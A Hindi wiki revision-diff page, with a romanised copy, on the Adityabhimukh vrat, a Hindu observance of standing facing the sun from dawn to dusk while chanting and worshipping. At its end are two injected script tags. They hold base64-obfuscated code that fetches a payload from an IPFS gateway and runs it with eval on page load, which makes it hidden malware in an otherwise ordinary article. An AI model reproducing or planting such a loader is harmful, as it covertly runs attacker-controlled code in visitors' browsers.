Difference between revisions of "आदित्याभिमुख विधि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
*इस विधि में प्रातः स्नान के उपरान्त सायंकाल तक सूर्याभिमुख होकर खड़ा रहना चाहिए। <ref>कृत्यकल्पतरु (व्रतखण्ड 18-19), हेमाद्रि व्रतखण्ड (2, 525-26), कृत्यरत्नाकर (494-495)।</ref>  
+
*इस विधि में प्रातः स्नान के उपरान्त सायंकाल तक सूर्याभिमुख होकर खड़ा रहना चाहिए।<ref>कृत्यकल्पतरु (व्रतखण्ड 18-19), हेमाद्रि व्रतखण्ड (2, 525-26), कृत्यरत्नाकर (494-495)।</ref>  
 
*किसी स्तम्भ से उठंग कर (सटे रहकर) महाश्वेता मन्त्र का जप करना चाहिए।  
 
*किसी स्तम्भ से उठंग कर (सटे रहकर) महाश्वेता मन्त्र का जप करना चाहिए।  
 
*गन्ध, [[भारत के पुष्प|पुष्प]] आदि से पूजा करनी चाहिए।
 
*गन्ध, [[भारत के पुष्प|पुष्प]] आदि से पूजा करनी चाहिए।

Revision as of 06:25, 15 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • is vidhi mean pratah snan ke uparant sayankal tak sooryabhimukh hokar kh da rahana chahie.[1]
  • kisi stambh se uthang kar (sate rahakar) mahashveta mantr ka jap karana chahie.
  • gandh, pushp adi se pooja karani chahie.
  • dakshina dekar bhojan karana chahie.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. krityakalpataru (vratakhand 18-19), hemadri vratakhand (2, 525-26), krityaratnakar (494-495).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>